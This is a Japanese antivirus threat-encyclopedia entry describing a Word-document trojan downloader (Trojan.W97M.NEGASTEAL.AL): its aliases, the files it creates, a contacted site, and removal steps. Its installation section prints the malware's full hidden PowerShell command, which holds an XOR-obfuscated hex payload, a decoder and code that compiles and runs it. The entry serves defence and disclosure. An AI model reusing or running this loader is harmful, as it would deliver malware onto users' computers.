別名:

TrojanDownloader:O97M/Obfuse.HXK!MTB (Microsoft); Trojan:W32/MalDoc.A (FSecure)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
     

  • 感染報告の有無 :
    はい

  概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 34,007 bytes
タイプ DOCX
メモリ常駐 はい
発見日 2020年1月23日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

  • powershell -WindowStyle Hidden function fadb7 {param($me3fc)$med46b2='v5a26';$bc2b52='';for ($i=0; $i -lt $me3fc.length;$i+=2){$nece8f=[convert]::ToByte($me3fc.Substring($i,2),16);$bc2b52+=[char]($nece8f -bxor $med46b2[($i/2)%$med46b2.length]);}return $bc2b52;} $y17d63 = '0346085c51566618414213585a47451f5b0612650f4615575b5867145c421f58041c7f184104405906660440401f5604410d0346085c51566618414213584f765f17520f5d45025c02410d0346085c51566618414213584f7b794d40125b581115324b4502500c1c7813415a3f3c0640035e5f1515025e570546415402130c53064d2d710d5e7f1b450e40425e170a574418500d01045419245c42044c315d5f18415c107113413140591574055644134612101f2b151147541a5c0212450254155b555650194653045b417b58026515401607505556055e7c0f46660247415704170258000e5a4615405f185241400444540000525f0e3a765a1a7c0c4259044149105d13470f575a4507431e16335b15404f265a085c42560841107a1954057e5f144700404f541c3c124603570d5b5556461553421f5641574e0250135c163f5b15624204151856074400521a450247085c51564505570f1701001b0d2d710d5e7f1b450e40425e170a574418500d0104541941775802471862591f5b150f14205c134643175931405902500246145f684142431459085116054100465f1515044a4213470f1254195a0d1244470c0403035e7c0f46660247414653470d58041a237c0f46660247415c5342005954555a15145b580215090552100059031a565a144616035c0f461605035557505f0e3a765a1a7c0c4259044149107d13470f575a45074f565a1a174d12731841134b66195c0f460b5467155e7b1943047f531b5a134b145a153257423a5412467304470e400b10540d41535f684141421741085116134d1557441815175d5f12150451544e03497b5802651540160e570403504719285c422641131244170102531a1f5b15124547020456004f1c5a42431459085116054100465f1515085c4256590054054301051a1f0d7c0f4666024741560f4f075707164b151856074400521a50175103051e540456070e47075450074e0453070f4651431b1f4d5c071a524f0c5304034b08285c422641131c6c13470e1b4d115a155d161a5100570410505a4f7f1841314644564d045001170c560f47130105011e120c58000043190753521402491005410059030443575707074300550250410555010746005202024205431b1f4d5c071a4e135756530f41085c7b5802651540182c50135d1f0d520e46595659055353445304094b237c0f466602474159011250570f1e237c0f4666024748070d035c0f46160104025704140851095f101d4040074f5050071e0e500305574f024d59011250571e060e01511e590341414507155053501f5f4e065d4219150d5657130707570d0b771846532d68415707440453030b0d051901075a051954505a05190b060b0e285c4226411312474404530b0043082c5344055d005e1837590d5d553e720d5d54175949011f4d780040451e540d1c751945181a5347075000075a054d430447075804035a06480953155759041e185016127f18413146445e4d045001170c561c62197c0f4600421d4819060e055103545f19100007440c57071a451c5a5e5217505354534c15365754355908575802151354034f00580b0b18501612611357225e5f135b151a1f4d4615405f1852415a544507580f7318430840591858045c42587204467019590557442654155a1e335b175b44195b0c5758021b324253155c005e701959055744587411425a1f5600465f195b255342171c4a106a2a5d03500e44174a54571257561a14430d5402074f0056101f4d4707070f430c581c7219420f5e591751275b5a131d07535214024910071301500303420755070215040006534200550306470403020e43565507064000020305430655000710000002504357550707130403020443515450034f0354020642035506074f000306534007570003400052020e43505401034e0051030f4302431b1a1e5752000f5f0e3140591550124165025413467f18530e125745515057034b5b04451626470e515305463246570441285c50191d095005440c480966045a025745051b3246570441495305120404071f4d47044643045b41020d0b4514505a1f5641414217410851160541135b5811150753521402494142045c0f55160c0605065240514849450247085c5156505353014f07590f140000000000540e1246441f5b06124f12045307054b6615405f18524f775b06411809501947495b580215080f064d5c5d480512010504525879045c51025d5a5b1d4b074849540f41041247130105010b355a0f445304414f6659344c15571e0c0605065240514f6143144615405f1852495b1a441c4d03005f0e185607440052190b5e560953445f1d1057021206416c16130700050f440d3a1a5f590748121356505353014f07591c7a135b06465e2b1c5a4f441341144058564c05030443065a4f4b'; $y17d632 = fadb7($y17d63); Add-Type -TypeDefinition $y17d632; [f4e924]::laf354d();
  • "%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\xahvdf4s.cmdline"
  • %Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RES9A9A.tmp" "%User Temp%\CSC9A7A.tmp"

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)

他のシステム変更

マルウェアは、以下のファイルを改変します。

  • %Application Data%\Microsoft\Office\Word12.pip

(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)

作成活動

マルウェアは、以下のファイルを作成します。

  • %User Temp%\xahvdf4s.0.cs
  • %Application Data%\hbb82.exe
  • %System Root%\BVTBin\Tests\installpackage\csilogfile.log
  • %User Temp%\xahvdf4s.dll
  • %User Temp%\xahvdf4s.pdb
  • %User Temp%\xahvdf4s.cmdline
  • %Application Data%\Microsoft\UProof\CUSTOM.DIC
  • %User Temp%\xahvdf4s.out
  • %User Temp%\xahvdf4s.err
  • %Application Data%\Microsoft\Office\Word12.pip
  • {malware file path and name}

(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

  • http://www.{BLOCKED}ationish.com

このウイルス情報は、自動解析システムにより作成されました。

  対応方法

対応検索エンジン: 9.850

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

「Trojan.W97M.NEGASTEAL.AL」で検出したファイル名を確認し、そのファイルを終了します。

[ 詳細 ]

  • すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
  • 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
    セーフモードについては、こちらをご参照下さい。
  • 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。

手順 3

以下のファイルを検索し削除します。

[ 詳細 ]
コンポーネントファイルが隠しファイル属性の場合があります。[詳細設定オプション]をクリックし、[隠しファイルとフォルダの検索]のチェックボックスをオンにし、検索結果に隠しファイルとフォルダが含まれるようにしてください。
  • %User Temp%\xahvdf4s.0.cs
  • %Application Data%\hbb82.exe
  • %System Root%\BVTBin\Tests\installpackage\csilogfile.log
  • %User Temp%\xahvdf4s.dll
  • %User Temp%\xahvdf4s.pdb
  • %User Temp%\xahvdf4s.cmdline
  • %Application Data%\Microsoft\UProof\CUSTOM.DIC
  • %User Temp%\xahvdf4s.out
  • %User Temp%\xahvdf4s.err
  • %Application Data%\Microsoft\Office\Word12.pip
  • {malware file path and name}

手順 4

最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.W97M.NEGASTEAL.AL」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

手順 5

以下のファイルをバックアップを用いて修復します。マイクロソフト製品に関連したファイルのみに修復されます。このマルウェアが同社製品以外のプログラムをも削除した場合には、該当プログラムを再度インストールする必要があります。

  • %Application Data%\Microsoft\Office\Word12.pip


ご利用はいかがでしたか? アンケートにご協力ください